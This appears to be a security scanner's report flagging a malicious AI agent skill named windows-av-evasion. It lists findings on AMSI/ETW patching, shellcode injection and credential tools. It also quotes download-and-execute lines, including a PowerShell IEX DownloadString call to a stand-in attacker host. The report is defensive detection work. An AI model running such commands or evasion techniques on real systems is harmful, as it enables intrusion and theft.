windows-av-evasion

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is an explicit AV/EDR evasion playbook providing step-by-step techniques to disable/patch defenses (AMSI, ETW), execute and inject shellcode, load and obfuscate .NET assemblies, use direct syscalls/fresh ntdll to bypass hooks, and leverage C2 frameworks and tools like Rubeus/Mimikatz—clearly intended to enable remote code execution, credential theft, backdoors and persistent compromise.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The SKILL.md and AMSI_BYPASS_TECHNIQUES.md explicitly instruct downloading and loading payloads from external URLs (e.g., DownloadAndDecrypt("https://attacker/tool.enc") and PowerShell IEX (New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')), meaning the agent would ingest untrusted third-party content that can directly alter execution and decisions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill includes explicit runtime download-and-execute examples that fetch and run remote code (e.g., "http://attacker/payload.ps1" in the PowerShell IEX DownloadString example and "https://attacker/tool.enc" in DownloadAndDecrypt/Assembly.Load), so those external URLs would directly deliver and control executable content at runtime.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs modifying system components and memory (AMSI/ETW patches, overwriting ntdll, process injection, shellcode execution, direct syscalls) to bypass security controls, which directly compromises the host state.